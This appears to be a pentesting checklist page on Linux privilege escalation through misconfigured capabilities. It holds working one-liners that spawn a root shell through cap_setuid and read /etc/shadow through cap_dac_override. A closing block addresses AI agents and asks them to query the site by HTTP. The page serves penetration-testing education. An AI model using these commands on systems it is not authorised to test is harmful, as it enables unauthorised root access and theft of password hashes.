# Capabilities

### Overview

Linux **Capabilities** split traditional root privileges into smaller, granular privileges that can be assigned to processes or binaries.

Instead of giving a binary full SUID root access, administrators can grant specific capabilities like:

* `cap_setuid`
* `cap_net_bind_service`
* `cap_sys_admin`
* `cap_dac_override`

Capabilities are managed through:

```bash
setcap
getcap
```

While designed to improve security by avoiding full SUID root binaries, **misconfigured capabilities can still lead to privilege escalation**.

### Why this Works

Traditionally:

* If a binary is SUID → it runs fully as root.

With capabilities:

* A binary can run with **specific elevated powers**
* Even if executed by a low-privileged user

The problem occurs when:

* A binary has powerful capabilities like `cap_setuid`
* The binary allows command execution or shell spawning
* The binary is writable or misconfigured

For example:

If `/usr/bin/python3` has:

```bash
cap_setuid+ep
```

An attacker can call the below code and get an instant root shell.

```python
import os
os.setuid(0)
os.system("/bin/bash")
```

### Common Dangerous Capabilities

| Capability              | Why It's Dangerous                |
| ----------------------- | --------------------------------- |
| cap\_setuid             | Allows changing UID → become root |
| cap\_setgid             | Allows changing GID               |
| cap\_dac\_override      | Bypass file permission checks     |
| cap\_sys\_admin         | Extremely powerful (almost root)  |
| cap\_net\_bind\_service | Bind to privileged ports          |
| cap\_sys\_ptrace        | Debug other processes             |

### Steps

1. Find binaries with capabilities:

   ```
   getcap -r / 2>/dev/null
   ```
2. Check for dangerous capabilities like `cap_setuid+ep`.
3. Example1:

   If:

   ```bash
   /usr/bin/python3 = cap_setuid+ep OR cap_setuid=ep 
   ```

   Exploit:

   ```bash
   python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
   ```
4. Example2:\
    If a binary has:

   ```bash
   cap_dac_override+ep
   ```

   You can read protected files:

   ```bash
   python3 -c 'print(open("/etc/shadow").read())'
   ```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/linux/linux-privilege-escalation/capabilities.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.